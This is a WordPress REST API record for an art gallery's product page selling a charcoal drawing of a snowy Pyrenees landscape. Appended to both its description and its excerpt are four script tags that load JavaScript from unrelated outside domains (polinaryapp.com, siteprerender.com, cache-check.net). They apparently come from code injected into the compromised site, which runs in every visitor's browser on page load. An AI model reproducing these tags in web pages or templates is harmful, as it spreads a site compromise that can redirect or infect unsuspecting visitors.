{"id":1832,"date":"2020-12-11T15:01:07","date_gmt":"2020-12-11T14:01:07","guid":{"rendered":"https:\/\/tania-art-gallery.com\/?post_type=product&#038;p=1832"},"modified":"2020-12-11T15:02:35","modified_gmt":"2020-12-11T14:02:35","slug":"paysage-ennege-des-pyrenees-tableau-au-fusain","status":"publish","type":"product","link":"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/","title":{"rendered":"Paysage enneg\u00e9 des Pyr\u00e9n\u00e9es, tableau au fusain"},"content":{"rendered":"<p><span style=\"color: #000000;\">Description longue du tableau:<\/span><\/p>\n<p><span style=\"color: #000000;\">Tableau au fusain.<\/span><\/p>\n<p><span style=\"color: #000000;\">Paysage des Pyr\u00e9n\u00e9es en hivers<\/span><\/p>\n<p><span style=\"color: #000000;\">R\u00e9alis\u00e9 en 2016<\/span><\/p>\n<p><span style=\"color: #000000;\">Dimensions: 30 x 40 cm<\/span><\/p>\n<p><span style=\"color: #000000;\">Vendu avec un passe-partout<\/span><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607695296156\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span style=\"color: #000000;\">Tableau au fusain.<\/span><\/p>\n<p><span style=\"color: #000000;\">Paysage des Pyr\u00e9n\u00e9es en hivers, un sentier enneig\u00e9 au milieu des sapins.<\/span><\/p>\n<p><span style=\"color: #000000;\">R\u00e9alis\u00e9 en 2016<\/span><\/p>\n<p><span style=\"color: #000000;\">Dimensions: 30 x 40 cm<\/span><\/p>\n<p><span style=\"color: #000000;\">Vendu avec un passe-partout<\/span><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607695296202\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":1833,"template":"","meta":{"spay_email":""},"class_list":{"0":"post-1832","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","5":"hentry","6":"product_cat-tableaux-au-fusain","8":"entry","9":"has-media","10":"owp-thumbs-layout-horizontal","11":"owp-btn-normal","12":"owp-tabs-layout-vertical","13":"has-no-thumbnails","14":"has-product-nav"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Paysage enneg\u00e9 des Pyr\u00e9n\u00e9es, tableau au fusain - Les Arts de Tania KMIT - dessin - pastel - gravure<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Paysage enneg\u00e9 des Pyr\u00e9n\u00e9es, tableau au fusain - Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"og:description\" content=\"Tableau au fusain.  Paysage des Pyr\u00e9n\u00e9es en hivers, un sentier enneig\u00e9 au milieu des sapins.  R\u00e9alis\u00e9 en 2016  Dimensions: 30 x 40 cm  Vendu avec un passe-partout\" \/>\n<meta property=\"og:url\" content=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/\" \/>\n<meta property=\"og:site_name\" content=\"Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-11T14:02:35+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4523-e1607694512112.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"500\" \/>\n\t<meta property=\"og:image:height\" content=\"372\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/\",\"url\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/\",\"name\":\"Paysage enneg\u00e9 des Pyr\u00e9n\u00e9es, tableau au fusain - Les Arts de Tania KMIT - dessin - pastel - gravure\",\"isPartOf\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4523-e1607694512112.jpg\",\"datePublished\":\"2020-12-11T14:01:07+00:00\",\"dateModified\":\"2020-12-11T14:02:35+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/#primaryimage\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4523-e1607694512112.jpg\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4523-e1607694512112.jpg\",\"width\":500,\"height\":372,\"caption\":\"Paysage des Pyr\u00e9n\u00e9es en hiver, fusain, 2016\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/tania-art-gallery.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/tania-art-gallery.com\/index.php\/boutique\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Paysage enneg\u00e9 des Pyr\u00e9n\u00e9es, tableau au fusain\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/tania-art-gallery.com\/#website\",\"url\":\"https:\/\/tania-art-gallery.com\/\",\"name\":\"Les Arts de Tania KMIT - dessin - pastel - gravure\",\"description\":\"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture\",\"publisher\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/tania-art-gallery.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\",\"name\":\"admin9071\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"width\":171,\"height\":270,\"caption\":\"admin9071\"},\"logo\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/tania-art-gallery.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Paysage enneg\u00e9 des Pyr\u00e9n\u00e9es, tableau au fusain - Les Arts de Tania KMIT - dessin - pastel - gravure","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/","og_locale":"fr_FR","og_type":"article","og_title":"Paysage enneg\u00e9 des Pyr\u00e9n\u00e9es, tableau au fusain - Les Arts de Tania KMIT - dessin - pastel - gravure","og_description":"Tableau au fusain.  Paysage des Pyr\u00e9n\u00e9es en hivers, un sentier enneig\u00e9 au milieu des sapins.  R\u00e9alis\u00e9 en 2016  Dimensions: 30 x 40 cm  Vendu avec un passe-partout","og_url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/","og_site_name":"Les Arts de Tania KMIT - dessin - pastel - gravure","article_modified_time":"2020-12-11T14:02:35+00:00","og_image":[{"width":500,"height":372,"url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4523-e1607694512112.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/","url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/","name":"Paysage enneg\u00e9 des Pyr\u00e9n\u00e9es, tableau au fusain - Les Arts de Tania KMIT - dessin - pastel - gravure","isPartOf":{"@id":"https:\/\/tania-art-gallery.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/#primaryimage"},"image":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/#primaryimage"},"thumbnailUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4523-e1607694512112.jpg","datePublished":"2020-12-11T14:01:07+00:00","dateModified":"2020-12-11T14:02:35+00:00","breadcrumb":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/#primaryimage","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4523-e1607694512112.jpg","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/12\/IMG-4523-e1607694512112.jpg","width":500,"height":372,"caption":"Paysage des Pyr\u00e9n\u00e9es en hiver, fusain, 2016"},{"@type":"BreadcrumbList","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/paysage-ennege-des-pyrenees-tableau-au-fusain\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/tania-art-gallery.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/tania-art-gallery.com\/index.php\/boutique\/"},{"@type":"ListItem","position":3,"name":"Paysage enneg\u00e9 des Pyr\u00e9n\u00e9es, tableau au fusain"}]},{"@type":"WebSite","@id":"https:\/\/tania-art-gallery.com\/#website","url":"https:\/\/tania-art-gallery.com\/","name":"Les Arts de Tania KMIT - dessin - pastel - gravure","description":"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture","publisher":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/tania-art-gallery.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":["Person","Organization"],"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a","name":"admin9071","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","width":171,"height":270,"caption":"admin9071"},"logo":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/tania-art-gallery.com"]}]}},"_links":{"self":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product\/1832","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media\/1833"}],"wp:attachment":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=1832"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}